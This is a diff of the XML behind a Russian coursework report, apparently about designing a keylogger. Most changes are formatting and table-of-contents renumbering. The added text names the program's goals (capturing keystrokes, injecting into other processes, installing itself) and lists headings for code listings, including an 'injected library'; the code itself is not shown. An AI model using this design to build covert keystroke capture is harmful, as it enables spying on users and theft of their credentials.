             </w:r>
@@ -1991,8 +1749,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -2000,25 +1756,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712314 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752655 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2026,17 +1776,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>12</w:t>
+              </w:rPr>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2046,20 +1792,17 @@
           <w:pPr>
             <w:pStyle w:val="11"/>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712315" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752656" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>ЗАКЛЮЧЕНИЕ</w:t>
             </w:r>
@@ -2067,8 +1810,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2076,8 +1817,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -2085,25 +1824,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712315 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752656 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2111,17 +1844,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>13</w:t>
+              </w:rPr>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2131,20 +1860,17 @@
           <w:pPr>
             <w:pStyle w:val="11"/>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712316" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752657" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="en-US"/>
               </w:rPr>
               <w:t>Список литературы</w:t>
@@ -2153,8 +1879,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2162,8 +1886,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -2171,25 +1893,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712316 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752657 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2197,17 +1913,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>14</w:t>
+              </w:rPr>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2217,20 +1929,17 @@
           <w:pPr>
             <w:pStyle w:val="11"/>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712317" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752658" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>ПРИЛОЖЕНИЕ А</w:t>
             </w:r>
@@ -2238,8 +1947,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2247,8 +1954,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -2256,25 +1961,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712317 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752658 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2282,17 +1981,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>15</w:t>
+              </w:rPr>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2305,20 +2000,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712318" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752659" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>Листинг кода исполняемого файла:</w:t>
             </w:r>
@@ -2326,8 +2018,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2335,8 +2025,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -2344,25 +2032,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712318 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752659 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2370,17 +2052,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>15</w:t>
+              </w:rPr>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2393,20 +2071,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712319" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752660" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>Листинг</w:t>
             </w:r>
@@ -2414,9 +2089,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
@@ -2425,9 +2097,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>кода</w:t>
             </w:r>
@@ -2435,9 +2104,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
@@ -2446,9 +2112,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>инжектируемой</w:t>
             </w:r>
@@ -2456,9 +2119,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
@@ -2467,9 +2127,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>библиотеки</w:t>
             </w:r>
@@ -2477,9 +2134,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>:</w:t>
@@ -2488,8 +2142,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2497,8 +2149,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -2506,25 +2156,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712319 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752660 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2532,17 +2176,149 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>17</w:t>
+              </w:rPr>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="11"/>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc420752661" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a3"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>ПРИЛОЖЕНИЕ Б</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752661 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>25</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="11"/>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc420752662" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a3"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>ПРИЛОЖЕНИЕ В</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752662 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>26</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2589,10 +2365,10 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc414805627"/>
-      <w:bookmarkStart w:id="1" w:name="_Toc419842033"/>
-      <w:bookmarkStart w:id="2" w:name="_Toc420705252"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc420712301"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc414805627"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc419842033"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc420705252"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc420752642"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -2602,8 +2378,8 @@
         <w:lastRenderedPageBreak/>
         <w:t>В</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
       <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -2612,8 +2388,8 @@
         </w:rPr>
         <w:t>ВЕДЕНИЕ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
       <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2798,9 +2574,9 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc419842034"/>
-      <w:bookmarkStart w:id="5" w:name="_Toc420705253"/>
-      <w:bookmarkStart w:id="6" w:name="_Toc420712302"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc419842034"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc420705253"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc420752643"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2808,7 +2584,7 @@
         </w:rPr>
         <w:t>О</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2816,8 +2592,8 @@
         </w:rPr>
         <w:t>БЗОР ЛИТЕРАТУРЫ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
       <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2856,8 +2632,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc420705254"/>
-      <w:bookmarkStart w:id="8" w:name="_Toc420712303"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc420705254"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc420752644"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2865,8 +2641,8 @@
         </w:rPr>
         <w:t>Спецификация клавиатурных снифферов</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
       <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2979,8 +2755,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc420705255"/>
-      <w:bookmarkStart w:id="10" w:name="_Toc420712304"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc420705255"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc420752645"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3008,8 +2784,8 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
       <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3639,8 +3415,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc420705260"/>
-      <w:bookmarkStart w:id="12" w:name="_Toc420712305"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc420705260"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc420752646"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3656,8 +3432,8 @@
         </w:rPr>
         <w:t>ИСТЕМНОЕ ПРОЕКТИРОВАНИЕ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
       <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3693,6 +3469,92 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Для проектирования приложения были определены задачи, которые должна выполнять программа:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="1276"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Отслеживание нажатий клавиш</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="1276"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Инжекция программы в сторонние процессы</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="1276"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Установка программы</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="2"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
@@ -3703,8 +3565,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc420705261"/>
-      <w:bookmarkStart w:id="14" w:name="_Toc420712306"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc420705261"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc420752647"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3712,7 +3574,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>3</w:t>
+        <w:t>2</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3723,8 +3585,8 @@
         </w:rPr>
         <w:t>.1 Способ взаимодействия пользователя и программы.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
       <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3816,8 +3678,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc420705262"/>
-      <w:bookmarkStart w:id="16" w:name="_Toc420712307"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc420705262"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc420752648"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3825,7 +3687,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>3</w:t>
+        <w:t>2</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3836,8 +3698,6 @@
         </w:rPr>
         <w:t>.2 Структурная схема программы</w:t>
       </w:r>
-      <w:bookmarkStart w:id="17" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="15"/>
       <w:bookmarkEnd w:id="16"/>
       <w:bookmarkEnd w:id="17"/>
     </w:p>
@@ -3845,91 +3705,6 @@
       <w:pPr>
         <w:ind w:firstLine="360"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
